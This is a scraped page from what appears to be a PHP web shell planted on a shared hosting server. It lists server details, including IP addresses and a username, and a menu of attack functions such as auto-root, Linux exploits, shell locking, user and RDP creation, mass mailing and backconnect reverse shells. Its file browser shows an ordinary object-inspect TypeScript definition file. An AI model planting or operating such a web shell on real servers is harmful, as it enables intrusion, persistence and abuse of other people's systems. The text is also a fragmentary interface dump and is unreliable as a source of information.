Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
object-inspect /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.47
KB
-rw-r--r--
package.json
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for object-inspect 1.8 // Project: https://github.com/substack/object-inspect // Definitions by: Charles Samborski <https://github.com/demurgos> // Akuukis <https://github.com/Akuukis> // Jordan Harband <https://github.com/ljharb> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped declare namespace objectInspect { /** * Inspection options */ interface Options { /** * Maximum depth of the inspection. Default: `5`. */ depth?: number | undefined; /** * Must be "single" or "double", if present. */ quoteStyle?: 'single' | 'double' | undefined; /** * Must be 0, a positive integer, Infinity, or null, if present. Default Infinity. */ maxStringLength?: number | null | undefined; /** * When true, a custom inspect method function will be invoked. Default true. */ customInspect?: boolean | undefined; /** * Must be "\t", null, or a positive integer. Default null. */ indent?: number | '\t' | null | undefined; } } /** * Return a string `s` with the string representation of `obj` up to a depth of `opts.depth`. * * @param obj Object to inspect * @param opts Inspection options. Default: `{}`. * @return String representation of `obj` */ declare function objectInspect(obj: any, opts?: objectInspect.Options): string; export = objectInspect;
Close